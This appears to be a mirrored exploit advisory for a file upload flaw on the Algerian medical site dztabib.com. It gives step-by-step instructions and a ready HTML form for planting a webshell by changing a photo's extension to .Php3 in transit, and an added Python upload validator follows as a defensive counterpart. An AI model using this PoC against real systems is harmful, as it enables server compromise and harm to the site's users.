www.dztabib.com File upload vulnerability leads to webshell upload

CVE: CVE-2021-24327
Category: CWE-434
Price: Not specified
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2019-06-03
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019060012

Below is a copy:

##########################################################################
#  Title : www.dztabib.com File upload vulnerability leads to webshell & HTML files upload
#  Founder : Dj3Bb4rAn0n ( bassem ) FB/djebbar.bassem.16
#  Date : 02/06/2019
#  Home : Annaba ( Algeria )
#  Tested on : Linux ( Backbox )
##########################################################################


# PoC

 [ + ]  Register as a user on the website

 [ + ]  Log in to your account

 [ + ]  Go to this path : https://www.dztabib.com/parametres

 [ + ]  Upload your evil file with a jpeg extension. Don't forget to intercept the request with Burp or Tamper Data,

then change the extension to .Php3 or html and forward the request

Example : https://www.dztabib.com/storage/photo_profil/bBuSUDVeBeHTg0OTusInIVCXYzUkpuB57laqzrEx.


---------------------------------------------------------------------

<!-- File upload PoC -->
<html lang="en">
<head>
<title>File upload PoC</title>
<link href="https://fonts.googleapis.com/css?family=Iceland" rel="stylesheet">
<style>
button{border:2px solid #F00;border-radius:2px;}
input{border:2px solid #F00;border-radius:2px;width:100px;}
body .n00bi{font-family:'Iceland', cursive;color:green;text-shadow:2px 2px #F00;}
</style>
<script>
function alert_me(){
var Domain = "www.dztabib.com"
alert("Path of Evil file : \n" + Domain + "/storage/photo_profil/" + "[ Evil ]");
}
</script>
</head>
<body style="background-image:url(https://media.giphy.com/media/smzfl3E7a4iHK/giphy.gif);text-align:center" onload="alert_me()">
<div class="n00bi">
<header>
<h1> simple File upload form By Dj3Bb4rAn0n</h1>
</header>
</div><br>
<div class="content_img">
<article>
<img src="https://www.upload.ee/image/10006478/a.jpg" alt="I'm n00b :V" />
</article>
</div><br>
<form class="form-group" action="https://www.dztabib.com/edit/profile" method="post" enctype="multipart/form-data">
<input type="hidden" name="_token" value="2TDQZOjUU28MU9iuGrXbZm2p7RZkbkrcPTuw0M4S"> <!-- Change it with your token -->
<input type="hidden" name="_method" value="PUT">
    <input type="hidden" class="form-control" name="name" value="fuckyou" > 
    <input type="hidden" class="form-control" name="prenom" value="fuckyou" >
<input id="age" type="hidden" class="form-control" name="age" value="20" required autofocus>
    <input id="wilaya" type="hidden" class="form-control" name="wilaya" value="fuckyou" required autofocus>
    <input id="adresse" type="hidden" class="form-control" name="adresse" value="[email protected]" required autofocus> <!-- Change it with your email -->
    <input id="photo" type="file" class="form-control" name="photo" >
    <input id="email" type="hidden" class="form-control" name="email" value="[email protected]" required>
    <button type="submit" class="n00b">Submit the request</button>
</form>
</body>
</html>
--------------------------------------------------------------

Sh00tz To my PC

-------------------------------------------------------------
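
Defensive counterpart to the PoC above, added here as an example and not part of the original advisory or the site's code: a server-side check that ignores the extension sent in the request, identifies the image from its leading bytes, and assigns its own random filename and extension. The name accept_photo, the size limit and the sample requests are assumptions constructed for illustration.

```python
import os
import secrets
from dataclasses import dataclass

# Allowlist: leading magic bytes -> extension the server assigns.
MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png"}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit for a profile photo


@dataclass
class Stored:
    name: str           # server-generated filename
    client_ext: str     # extension the request claimed, kept for logging only
    ext_mismatch: bool  # True when the claimed extension disagrees with content


def accept_photo(client_filename: str, body: bytes) -> Stored:
    """Validate an uploaded profile photo and choose its stored name.

    Raises ValueError for anything that is not an allowlisted image.
    """
    if not 0 < len(body) <= MAX_BYTES:
        raise ValueError("empty or oversized upload")
    ext = next((e for m, e in MAGIC.items() if body.startswith(m)), None)
    if ext is None:
        raise ValueError("content is not an allowlisted image type")
    # The client filename is attacker-controlled: use it for logging only.
    client_ext = os.path.splitext(client_filename)[1].lstrip(".").lower()
    mismatch = {"jpeg": "jpg"}.get(client_ext, client_ext) != ext
    # Random name plus an extension derived from content, never from the request.
    return Stored(f"{secrets.token_hex(20)}.{ext}", client_ext, mismatch)


# Constructed sample requests (not captured traffic).
JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + b"\xff\xd9"
SAMPLES = [
    ("avatar.jpeg", JPEG),                 # honest upload
    ("avatar.Php3", JPEG + b"appended"),   # extension changed in transit
    ("avatar.html", b"<html><body>x</body></html>"),
]

if __name__ == "__main__":
    for fname, data in SAMPLES:
        try:
            print(fname, "->", accept_photo(fname, data))
        except ValueError as err:
            print(fname, "-> rejected:", err)
```

Serving the upload directory with script execution disabled and a fixed image Content-Type covers files that pass the magic-byte check but carry extra data.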
